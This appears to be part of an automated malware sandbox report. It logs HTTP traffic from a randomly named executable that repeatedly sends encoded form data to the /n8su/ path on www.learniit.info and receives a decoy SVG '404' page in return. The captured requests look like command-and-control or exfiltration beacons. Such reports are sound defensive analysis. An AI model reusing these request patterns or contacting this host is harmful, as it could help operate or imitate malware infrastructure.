                                                                                  Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                                  Dec 9, 2024 06:58:18.361330986 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                                  Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.749968203.161.42.73805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:58:19.680959940 CET849OUTPOST /n8su/ HTTP/1.1
                                                                                  Host: www.learniit.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.learniit.info
                                                                                  Referer: http://www.learniit.info/n8su/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 6f 48 35 61 4d 31 6a 6b 68 64 55 6a 62 74 67 6e 52 51 44 44 47 56 34 70 36 59 4a 68 6b 67 7a 30 70 5a 46 76 6f 37 34 2b 7a 4c 2f 6a 41 45 65 44 42 4c 6b 79 76 48 78 30 50 74 59 6f 2f 42 4a 75 63 65 64 52 76 51 58 4a 66 39 4f 4f 73 38 66 64 31 31 36 71 41 64 38 42 72 6f 33 6b 46 70 6c 54 6e 6d 63 47 43 45 45 75 44 71 37 45 33 63 71 64 30 39 44 66 5a 52 66 36 69 36 4f 51 66 69 53 58 5a 72 46 5a 54 36 66 6b 64 65 47 64 37 32 41 6a 31 5a 4d 30 50 4c 4c 57 4a 4b 45 77 79 4d 76 32 70 57 44 4c 6a 71 52 57 52 39 47 79 39 57 58 74 51 69 74 74 67 72 6e 53 68 45 2f 43 37 68 4e 43 38 7a 59 54 68 49 45 36 56 64 48 6b 4e 6e 6b 34 33 4e 58 56 4b 74 61 6d 72 54 62 5a 47 36 39 36 32 76 4f 59 57 68 34 3d
                                                                                  Data Ascii: PHM8hj-=oH5aM1jkhdUjbtgnRQDDGV4p6YJhkgz0pZFvo74+zL/jAEeDBLkyvHx0PtYo/BJucedRvQXJf9OOs8fd116qAd8Bro3kFplTnmcGCEEuDq7E3cqd09DfZRf6i6OQfiSXZrFZT6fkdeGd72Aj1ZM0PLLWJKEwyMv2pWDLjqRWR9Gy9WXtQittgrnShE/C7hNC8zYThIE6VdHkNnk43NXVKtamrTbZG6962vOYWh4=
                                                                                  Dec 9, 2024 06:58:20.897641897 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 09 Dec 2024 05:58:20 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Dec 9, 2024 06:58:20.897675991 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                                  Dec 9, 2024 06:58:20.897687912 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                                  Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                                  Dec 9, 2024 06:58:20.897701979 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                  Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                                  Dec 9, 2024 06:58:20.897713900 CET896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                                  Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                                  Dec 9, 2024 06:58:20.897810936 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                                  Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                                  Dec 9, 2024 06:58:20.897826910 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                                  Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                                                  Dec 9, 2024 06:58:20.897927999 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                  Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                                                  Dec 9, 2024 06:58:20.897945881 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                                  Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                                  Dec 9, 2024 06:58:20.897959948 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                                  Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                                                  Dec 9, 2024 06:58:21.017460108 CET1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                                                  Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.749974203.161.42.73805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:58:22.353539944 CET1862OUTPOST /n8su/ HTTP/1.1
                                                                                  Host: www.learniit.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.learniit.info
                                                                                  Referer: http://www.learniit.info/n8su/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 6f 48 35 61 4d 31 6a 6b 68 64 55 6a 62 74 67 6e 52 51 44 44 47 56 34 70 36 59 4a 68 6b 67 7a 30 70 5a 46 76 6f 37 34 2b 7a 4c 33 6a 41 32 57 44 44 71 6b 79 6f 48 78 30 47 4e 59 38 2f 42 49 73 63 65 31 64 76 51 62 5a 66 2f 47 4f 2b 75 6e 64 7a 42 75 71 54 39 38 42 70 6f 33 68 61 35 6c 4b 6e 69 41 43 43 45 55 75 44 71 37 45 33 65 79 64 6c 73 44 66 56 78 66 35 6c 36 4f 4d 4a 69 53 7a 5a 71 74 76 54 36 62 65 64 76 6d 64 37 57 51 6a 77 72 55 30 51 37 4c 51 48 71 46 6c 79 4d 6a 6c 70 57 65 79 6a 71 4e 73 52 2f 57 79 2b 77 2b 30 49 79 6f 33 33 59 2f 49 6f 33 4c 55 74 78 55 79 78 68 67 70 68 72 78 55 57 61 44 4c 42 47 77 74 37 61 32 32 63 64 50 55 67 6e 57 4d 43 2f 38 2f 69 36 6d 37 42 48 4a 51 76 71 43 4d 62 78 47 5a 64 51 42 44 58 44 39 7a 57 4a 43 54 4c 6f 73 6b 47 4e 73 76 32 52 4d 78 76 48 57 68 57 49 4b 58 2f 77 6c 32 54 58 54 52 62 39 30 59 58 32 68 4d 52 59 77 74 5a 33 30 6c 6b 65 4b 74 57 32 5a 58 76 68 33 52 44 56 31 71 6a 38 6b 6b 43 49 2f 75 42 6c 56 6d 44 50 71 4c 5a 59 [TRUNCATED]
                                                                                  Data Ascii: PHM8hj-=oH5aM1jkhdUjbtgnRQDDGV4p6YJhkgz0pZFvo74+zL3jA2WDDqkyoHx0GNY8/BIsce1dvQbZf/GO+undzBuqT98Bpo3ha5lKniACCEUuDq7E3eydlsDfVxf5l6OMJiSzZqtvT6bedvmd7WQjwrU0Q7LQHqFlyMjlpWeyjqNsR/Wy+w+0Iyo33Y/Io3LUtxUyxhgphrxUWaDLBGwt7a22cdPUgnWMC/8/i6m7BHJQvqCMbxGZdQBDXD9zWJCTLoskGNsv2RMxvHWhWIKX/wl2TXTRb90YX2hMRYwtZ30lkeKtW2ZXvh3RDV1qj8kkCI/uBlVmDPqLZYohSQDSpSAm7KaXtS9zQvMZRJuvqiVapT0/a2kzWZG9LryM75KFnNrdNsryfkevOQS6cOrTnjzylOE6fvPz0tJ1SSE4+pbaOlCWA1PKfmfQTnFnblHYdwEQBn62zbugVMFj6vvz3shXjfJCr5+OFHyeedqYPUqS3Z9c1v52QUTiCH5D4nTVLZgOSWHvXSfn4d4C4/Xnun79VqU1z6Nq+ZPZ/jmsbY/XMDzfREHVvHO4nFZQ9xoL5zyn3nnlY4h4YMZ5zqkCs/tuWt/qKsMwwElGszn64mMBKh0gO+AL0sR0W8ZHuevrBvY8UU7gKR9ws80u/J75kF+YzT0A35VFxBhKDbuSyeLo4srjTq8JzKNlpNCSGVpEMJUGZiiXMS+vhvd2dLLM7Lip+WJLf6J10YPBt0jcelyPy6Bh0MaGiqK7sf2qpRugN4YoUbhX91SWDO4FK7PLDRyrv/g3cYTz/QAfSA4QtQTaYAr/8zNxnUYm6FrWXS+br7Crts/ET5wiMhfFWtSdo9iQvg+xLS7eDOe05nOLssBcNDURMHxEMKeVi1uzPC++OCMlQJlD1ntvvMD+lyq78f8BJqKiLmhIoPcO4eaePqW2v3H3059mttINaa7ZnbkO0gG5X8mNauLbVTwAiY3dKKzV9JyAp6LTL4fQAfYf9IL6jfOR [TRUNCATED]
                                                                                  Dec 9, 2024 06:58:23.583564997 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 09 Dec 2024 05:58:23 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Dec 9, 2024 06:58:23.583623886 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                                  Dec 9, 2024 06:58:23.583637953 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                                  Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                                  Dec 9, 2024 06:58:23.583739996 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                                  Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                                  Dec 9, 2024 06:58:23.583751917 CET896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                                  Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                                  Dec 9, 2024 06:58:23.583762884 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                                  Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                                  Dec 9, 2024 06:58:23.583800077 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                                  Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                                                  Dec 9, 2024 06:58:23.583815098 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                  Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                                                  Dec 9, 2024 06:58:23.583879948 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                                  Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                                  Dec 9, 2024 06:58:23.584009886 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                                  Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                                                  Dec 9, 2024 06:58:23.703191042 CET1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                                                  Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.749984203.161.42.73805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:58:25.029637098 CET560OUTGET /n8su/?tHfx=9byl&PHM8hj-=lFR6PBva/PMsONRUUBzFKHYbuqVDpA3Go4dEt9E07rmpJDSADrt1qR4xH95d6yRrR+B0iSrIYOXOwv3G4XacVuIE8qbhb6NY234rB3YRB473z9LLt/rnbiO/m9aaM2mDRrx6Wavidd+l HTTP/1.1
                                                                                  Host: www.learniit.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:58:26.256148100 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 09 Dec 2024 05:58:26 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
